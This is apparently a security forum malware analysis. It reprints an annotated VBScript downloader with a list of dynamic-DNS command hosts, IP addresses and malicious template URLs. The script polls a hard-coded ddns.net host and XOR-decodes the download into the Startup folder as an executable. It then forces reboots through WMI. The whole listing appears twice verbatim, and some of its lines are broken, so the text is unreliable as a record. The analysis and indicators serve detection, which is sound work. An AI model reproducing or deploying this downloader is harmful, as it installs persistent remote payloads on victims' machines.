本文为看雪论坛精华文章
看雪论坛作者ID:顾何
' Script preamble as shown in the analysed sample.
' COM ProgIDs are assembled from short string fragments, so the full names never
' appear as one contiguous literal in the file; signatures that match on literal
' ProgIDs need to account for the concatenation.
Dim uKSUBtGo
' Holds the text of a statement that would create WScript.Shell. Nothing in the
' visible listing evaluates or otherwise references this string.
uKSUBtGo = "Set WShell=CreateObject(""WSc" + "ri" + "pt.S" + "hel" + "l"")"
' Concatenates to the ProgID "WScript.Network".
Set vfKtZARk = CreateObject("WScr" + "ipt.Ne" + "two" + "rk")
' NOTE(review): the next two lines look like the analyst's de-obfuscated ProgIDs
' for the two strings above, not statements of the sample itself.
wscript.shell
wscript.Network
' Concatenates to the ProgID "Scripting.FileSystemObject".
Set wEDMwGJH = CreateObject("Sc" + "rip" + "ting.Fi" + "leSy" + "stemOb" + "ject")
' Reads the APPDATA environment variable. Environ is a VBA function, so this line
' presumably comes from the Office macro stage of the sample; confirm against the document.
AppPaths = Environ("Appdata")
' Download helper: issues a synchronous HTTP GET for the URL in xhmjPnsk through
' MSXML2.XMLHTTP and returns the raw response body when the status is 200.
' For any other status the function result is never assigned.
' Detection note: the request goes through the MSXML2.XMLHTTP COM object, and
' the URL is whatever the caller passes in.
Function CLDCvmeg(xhmjPnsk)
' Suppresses every runtime error in this function, so a failed request is silent.
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
' Third argument False = not asynchronous; .send blocks until the response arrives.
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
' ResponseBody is the undecoded byte content of the response.
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
' Repeating-key XOR transform from one file to another.
' Parameters:
'   KWKhBKJb - path of the input file; this routine deletes it afterwards
'   QuByZuyg - path of the output file; only created when it does not already exist
'   zgVWzifW - key: an array of values in 0..255, or a single value that is wrapped into an array
' Returns 1032 or 1031 when key validation fails; no other return value is assigned.
' Runtime errors are suppressed from "On Error Resume Next" until "On Error Goto 0" at the end.
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
' FileSystemObject I/O constants; only ForReading and TristateFalse are referenced below.
Const ForAppending = 8
Const ForReading = 1
Const ForWriting = 2
Const TristateFalse = 0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
' Accept a scalar key by turning it into a one-element array.
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
' Key validation: every element must be numeric and fit in one byte.
For UIzlfDOE = 0 To UBound( zgVWzifW )
' NOTE(review): the index here is i, not the loop variable UIzlfDOE; reproduced as captured.
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
' Input is opened as a text stream for reading; TristateFalse selects ASCII, not Unicode.
Set LVFaTeVS = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
' Input file is missing: no stream was opened on this path; the cleanup calls run
' under error suppression and the function exits without writing anything.
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
' Output path already exists: nothing is written, but the input file is still deleted.
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
' CreateTextFile( path, overwrite := True, unicode := False ) - output is an ASCII text stream.
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
' NOTE(review): the listing shows two XOR loops back to back. This first one uses Set with a
' number and contains a line that is not an assignment; any errors are hidden by
' On Error Resume Next. It may be a leftover from another variant - reproduced as captured.
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
' One input character XOR one key element, written as one output character.
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
' Second loop: same per-character XOR, with the key position kept in WDDOZIip.
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
' Advance the key position and wrap to 0 after the last key element (repeating key).
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
' The encoded input file is removed once the output has been written.
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set JKCjSZfP = Nothing
Set sRMmQeTH = Nothing
On Error Goto 0
End Function
' Converts the string JVVqpSiS into an array holding the character code (Asc) of
' each character, in order. The caller in this listing passes the result to Encode as the XOR key.
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
' One array slot per character (zero-based upper bound = length - 1).
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
' Mid is 1-based, the array is 0-based, hence the + 1.
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
' Returns a random string of qqKtOALe characters drawn from lowercase letters and digits.
' The caller in this listing uses it as a file name, so dropped file names differ on
' every run and are not a stable indicator; the fixed-length [a-z0-9] pattern is.
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
' Re-seeds the random number generator on every call.
Randomize
For UIzlfDOE = 1 To qqKtOALe
' Int(36 * Rnd + 1) selects a 1-based position in the 36-character alphabet.
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
' Stages a downloaded payload on disk and installs the decoded result for persistence:
'   1. writes data as binary to <Roaming>\<random 5 chars>.txt
'   2. deletes that file if it is smaller than 12425 bytes
'   3. XOR-decodes it with Encode into the per-user Startup folder as <same name>.exe
' Files in the Startup folder are launched at the next logon. The paths are hard-coded for
' the profile "Shyt", i.e. they were generated for one specific victim machine.
Sub save(data)
Dim IDrBJtww
' The placeholder value is overwritten at once by a random 5-character name.
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
' This FileSystemObject is created and released below without being used.
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
' From here on, errors (for example Empty data after a failed download) are suppressed.
On Error Resume Next
xIrnqUVA.Open
' Type = 1 is a binary stream.
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
' Fixed delay of 7273 ms before the file is touched again.
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
' Size gate: responses below 12425 bytes are discarded.
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
' XOR key = character codes of "9AC9AA87". The same string ends the host-specific folder in
' the download URL; presumably it is the hard-drive serial number (compare the
' ComputerName_HardDriveSerialNumber pattern in the indicator list) - confirm.
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
' Decoded output goes to the Startup folder with an .exe extension (logon persistence).
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
' Empty branch: the Encode result is checked but never acted on.
If oBsaEHDX <> 0 Then
End If
End Sub
' Main polling loop. pKeIwNCN is set to 1 and never changed, so the loop runs until the
' script host is terminated. Each pass: wait, download, stage the payload with save, then
' reboot the machine once enough .exe files are present beside the script.
pKeIwNCN = 1
Do While pKeIwNCN > 0
' 181244 ms (about three minutes) between requests: a regular beacon interval.
WScript.Sleep 181244
' The folder name in the URL has the form <computer name>_<8 hex characters>, so the request
' itself identifies the infected host to the server.
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
' Folder that contains the running script.
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
' NOTE(review): IDrBJtww is declared with Dim inside save, so at this scope it is presumably
' empty and this cleanup targets "...\Roaming\.txt" - confirm against the live sample.
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
' Count the .exe files in the script's own folder (extension compared case-insensitively).
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
' More than two .exe files: request a reboot through WMI. The moniker asks for the
' Shutdown and RemoteShutdown privileges, and Reboot() is called on each
' Win32_OperatingSystem instance.
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop
' Download helper: issues a synchronous HTTP GET for the URL in xhmjPnsk through
' MSXML2.XMLHTTP and returns the raw response body when the status is 200.
' For any other status the function result is never assigned.
' Detection note: the request goes through the MSXML2.XMLHTTP COM object, and
' the URL is whatever the caller passes in.
Function CLDCvmeg(xhmjPnsk)
' Suppresses every runtime error in this function, so a failed request is silent.
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
' Third argument False = not asynchronous; .send blocks until the response arrives.
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
' ResponseBody is the undecoded byte content of the response.
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
' Repeating-key XOR transform from one file to another.
' Parameters:
'   KWKhBKJb - path of the input file; this routine deletes it afterwards
'   QuByZuyg - path of the output file; only created when it does not already exist
'   zgVWzifW - key: an array of values in 0..255, or a single value that is wrapped into an array
' Returns 1032 or 1031 when key validation fails; no other return value is assigned.
' Runtime errors are suppressed from "On Error Resume Next" until "On Error Goto 0" at the end.
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
' FileSystemObject I/O constants; only ForReading and TristateFalse are referenced below.
Const ForAppending = 8
Const ForReading = 1
Const ForWriting = 2
Const TristateFalse = 0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
' Accept a scalar key by turning it into a one-element array.
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
' Key validation: every element must be numeric and fit in one byte.
For UIzlfDOE = 0 To UBound( zgVWzifW )
' NOTE(review): the index here is i, not the loop variable UIzlfDOE; reproduced as captured.
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
' Input is opened as a text stream for reading; TristateFalse selects ASCII, not Unicode.
Set LVFaTeVS = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
' Input file is missing: no stream was opened on this path; the cleanup calls run
' under error suppression and the function exits without writing anything.
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
' Output path already exists: nothing is written, but the input file is still deleted.
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
' CreateTextFile( path, overwrite := True, unicode := False ) - output is an ASCII text stream.
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
' NOTE(review): the listing shows two XOR loops back to back. This first one uses Set with a
' number and contains a line that is not an assignment; any errors are hidden by
' On Error Resume Next. It may be a leftover from another variant - reproduced as captured.
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
' One input character XOR one key element, written as one output character.
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
' Second loop: same per-character XOR, with the key position kept in WDDOZIip.
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
' Advance the key position and wrap to 0 after the last key element (repeating key).
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
' The encoded input file is removed once the output has been written.
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set JKCjSZfP = Nothing
Set sRMmQeTH = Nothing
On Error Goto 0
End Function
' Converts the string JVVqpSiS into an array holding the character code (Asc) of
' each character, in order. The caller in this listing passes the result to Encode as the XOR key.
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
' One array slot per character (zero-based upper bound = length - 1).
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
' Mid is 1-based, the array is 0-based, hence the + 1.
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
' Returns a random string of qqKtOALe characters drawn from lowercase letters and digits.
' The caller in this listing uses it as a file name, so dropped file names differ on
' every run and are not a stable indicator; the fixed-length [a-z0-9] pattern is.
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
' Re-seeds the random number generator on every call.
Randomize
For UIzlfDOE = 1 To qqKtOALe
' Int(36 * Rnd + 1) selects a 1-based position in the 36-character alphabet.
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
' Stages a downloaded payload on disk and installs the decoded result for persistence:
'   1. writes data as binary to <Roaming>\<random 5 chars>.txt
'   2. deletes that file if it is smaller than 12425 bytes
'   3. XOR-decodes it with Encode into the per-user Startup folder as <same name>.exe
' Files in the Startup folder are launched at the next logon. The paths are hard-coded for
' the profile "Shyt", i.e. they were generated for one specific victim machine.
Sub save(data)
Dim IDrBJtww
' The placeholder value is overwritten at once by a random 5-character name.
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
' This FileSystemObject is created and released below without being used.
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
' From here on, errors (for example Empty data after a failed download) are suppressed.
On Error Resume Next
xIrnqUVA.Open
' Type = 1 is a binary stream.
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
' Fixed delay of 7273 ms before the file is touched again.
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
' Size gate: responses below 12425 bytes are discarded.
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
' XOR key = character codes of "9AC9AA87". The same string ends the host-specific folder in
' the download URL; presumably it is the hard-drive serial number (compare the
' ComputerName_HardDriveSerialNumber pattern in the indicator list) - confirm.
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
' Decoded output goes to the Startup folder with an .exe extension (logon persistence).
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
' Empty branch: the Encode result is checked but never acted on.
If oBsaEHDX <> 0 Then
End If
End Sub
' Main polling loop. pKeIwNCN is set to 1 and never changed, so the loop runs until the
' script host is terminated. Each pass: wait, download, stage the payload with save, then
' reboot the machine once enough .exe files are present beside the script.
pKeIwNCN = 1
Do While pKeIwNCN > 0
' 181244 ms (about three minutes) between requests: a regular beacon interval.
WScript.Sleep 181244
' The folder name in the URL has the form <computer name>_<8 hex characters>, so the request
' itself identifies the infected host to the server.
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
' Folder that contains the running script.
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
' NOTE(review): IDrBJtww is declared with Dim inside save, so at this scope it is presumably
' empty and this cleanup targets "...\Roaming\.txt" - confirm against the live sample.
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
' Count the .exe files in the script's own folder (extension compared case-insensitively).
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
' More than two .exe files: request a reboot through WMI. The moniker asks for the
' Shutdown and RemoteShutdown privileges, and Reboot() is called on each
' Win32_OperatingSystem instance.
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop
http://yotaset.ddns.net/yota.dot
http://yotaset.ddns.net/
188.225.25.50
2.59.41.5
liqds.ddns.net 157.230.156.245
rifloreds.ddns.net 103.63.2.234
sebastiano.ddns.net 95.252.110.118 87.7.234.104 79.49.225.156
viewer.ddns.net 113.22.110.254 113.22.108.52 1.55.228.111
servincnet.ddns.net 51.75.207.74
maritatdeq.ddns.net 51.68.3.7
gsae.ddns.net 107.180.50.241
azomoney.ddns.net 185.136.159.224
conquer.ddns.net 197.57.70.187 197.57.203.100 197.57.33.182
pft0.ddns.net 42.2.152.197 1.65.198.132 1.65.206.162
pft0.ddns.net 42.2.152.197 1.65.198.132 1.65.206.162
service-paypalinc.ddns.net 62.210.119.140
icbc-pdc.ddns.net 159.138.11.152
harryng.ddns.net 105.112.104.181 185.247.228.13
xtremeratbilubilu.ddns.net 177.45.197.125 201.68.102.203
appleinc-webserv.ddns.net 134.209.189.165
isabellehome.ddns.net 82.64.31.82
evans227.ddns.net 185.165.153.31 194.5.98.19
sitertg.ddns.net 92.151.31.112 86.238.87.95 82.124.150.35
yasserexe.ddns.net 105.158.139.53 196.206.123.224 41.142.188.83
boseburo.ddns.net 79.247.91.19 79.247.86.117 79.247.88.177
hempelnextcloud.ddns.net 87.144.65.24 93.203.166.179 217.227.255.230
adsstorepos.ddns.net 201.123.73.13 201.123.20.33 201.123.66.60
zigf.ddns.net 91.193.75.66
sterytatoo.ddns.net 191.88.16.185 181.58.16.104
dbestgroupz.ddns.net 45.143.222.19
mynetwork.ddns.net 179.43.160.187 5.79.127.177
monworldidreset.ddns.net 51.75.194.39
yitfoh.ddns.net 52.139.244.149 52.230.61.128
btcnode.ddns.net 81.105.101.129
rmaos.ddns.net 185.62.189.133 197.211.61.129 91.236.116.189
jsoldnerfl.ddns.net 98.244.254.121
accontsupdateserv.ddns.net 165.227.39.38
westfalls.ddns.net 172.12.238.48
databyte34322.ddns.net 199.192.28.70
notathome.ddns.net 116.87.80.124 58.182.23.208 27.125.179.20
tyhhome.ddns.net 121.122.62.61
takik.ddns.net 153.188.235.250 220.96.125.189 180.27.216.207
izushuqsinc.ddns.net 174.127.99.145 103.200.6.3
relushd.ddns.net 126.99.225.57 126.7.225.197 126.51.236.45
posno.ddns.net 185.225.246.244 78.136.126.162
electrumx.ddns.net 165.73.105.234 165.73.107.106 102.182.254.126
binkar.ddns.net 61.5.71.185 36.74.55.132 36.79.234.98
christos.ddns.net 94.64.3.62
problemasmentais.ddns.net 181.221.208.245
host32.ddns.net 69.114.98.32 93.171.214.249 177.54.144.148
zxz.ddns.net 62.210.187.148 190.2.136.120 190.2.136.141
mywebhost.ddns.net 35.187.243.190
conterprise.ddns.net 95.89.143.8
popo856.ddns.net 78.199.5.77
pqhanh.ddns.net 222.150.1.208
dynupdate.ddns.net 58.158.177.102 91.235.168.230
136007a.ddns.net 120.157.39.129
izgemma.ddns.net 188.93.238.18 185.236.230.13 188.93.238.184
westensee.ddns.net 173.174.180.172
authentication008f.ddns.net 159.203.114.23
dfdfddf.ddns.net 31.43.223.111
pizzo3000.ddns.net 84.226.250.138 89.217.39.89 188.155.110.176
irfanadi.ddns.net 103.126.226.22
labeltogo.ddns.net
hd-proip.ddns.net 185.172.88.14 193.200.164.156 193.200.164.196
infectingraven.ddns.net 51.89.204.70 77.167.100.196
arlingford.ddns.net 81.129.197.68 81.153.174.70 86.132.12.91
disneyadamsfamily.ddns.net 67.174.118.149
azulnewspromo.ddns.net 108.178.29.162
itvrus2.ddns.net 149.56.241.228
molnarek.ddns.net 31.46.49.209
archimede1.ddns.net 185.38.150.159 5.226.139.5 51.255.95.121
amfamily6.ddns.net 73.22.174.61
mcmurphy7777.ddns.net 62.46.90.193 91.114.218.162 91.114.220.75
snup2019.ddns.net 105.112.115.126 105.112.113.224 105.112.120.121
zym.ddns.net 119.224.74.65
swshield.ddns.net 71.63.4.213
brian-computer.ddns.net 73.80.197.86
kissmeifucan.ddns.net 197.211.58.82 197.210.28.173 185.244.30.206
warhola.ddns.net 71.241.240.167 173.73.178.97 71.163.178.47
boncazmardz.ddns.net 51.68.3.7
gustaver.ddns.net 37.120.165.226 185.244.194.156 94.16.113.104
plspdlx.ddns.net 51.68.3.7
heinrich-fg.ddns.net 84.137.87.95 84.137.89.213 84.137.85.221
officezd.ddns.net 166.62.28.107
mchacker66.ddns.net 196.234.204.93 141.255.144.33 196.229.160.98
claviola.ddns.net 77.248.167.175 62.195.40.231
accounts-allerts001.ddns.net 157.245.231.137
bigloop.ddns.net 172.113.5.209
a2953575.ddns.net 175.180.247.26 175.181.212.179 175.182.99.78
tengomusica.ddns.net 71.6.201.66
iptvcolombia.ddns.net 66.240.236.25
sanvicente46.ddns.net 81.37.111.77
rdinterationalbrest.ddns.net 107.182.236.81
jfruhl713.ddns.net 80.108.124.29 62.178.35.113 84.112.139.164
fastway.ddns.net 62.210.90.216 195.154.178.101 54.39.53.95
pinetree.ddns.net 116.12.61.63
tatiefel.ddns.net 95.94.217.80 95.94.214.7 95.93.89.213
drunkconvert.ddns.net 136.49.131.171
fredooo.ddns.net 90.112.4.87 2.7.64.17 90.112.225.140
trasurablog.ddns.net 78.192.44.195
uc4lnc.ddns.net 185.14.166.35
suporte-30horas.ddns.net 177.189.7.171 177.139.72.190 187.11.37.120
23-11-6sgghh.ddns.net 103.27.238.234
http://office-constructor.ddns.net/obce.dot
http://librebooton.ddns.net/booton.dot
http://inbox-office.ddns.net/inbox.dot
http://libre-templates.ddns.net/internet.dot
http://word-gread.ddns.net/gread.dot
http://win-apu.ddns.net/apu.dot
http://office-lite.ddns.net/lite.dot
http://libre-templates.ddns.net/internet.dot
http://office-crash.ddns.net/crash.dot
http://office-out.ddns.net/out.dot
http://libre-templates.ddns.net/internet.dot
http://librebooton.ddns.net/booton.dot
http://micro-set.ddns.net/micro.dot
http://office-constructor.ddns.net/zaput.dot
http://win-ss.ddns.net/ss.dot
http://office-constructor.ddns.net/zaput.dot
http://get-icons.ddns.net/ComputerName_HardDriveSerialNumber//autoindex.php
http://network-crash.ddns.net/
http://network-crash.ddns.net/ComputerName_HardDriveSerialNumber/autoindex.php
看雪ID:顾何
https://bbs.pediy.com/user-757351.htm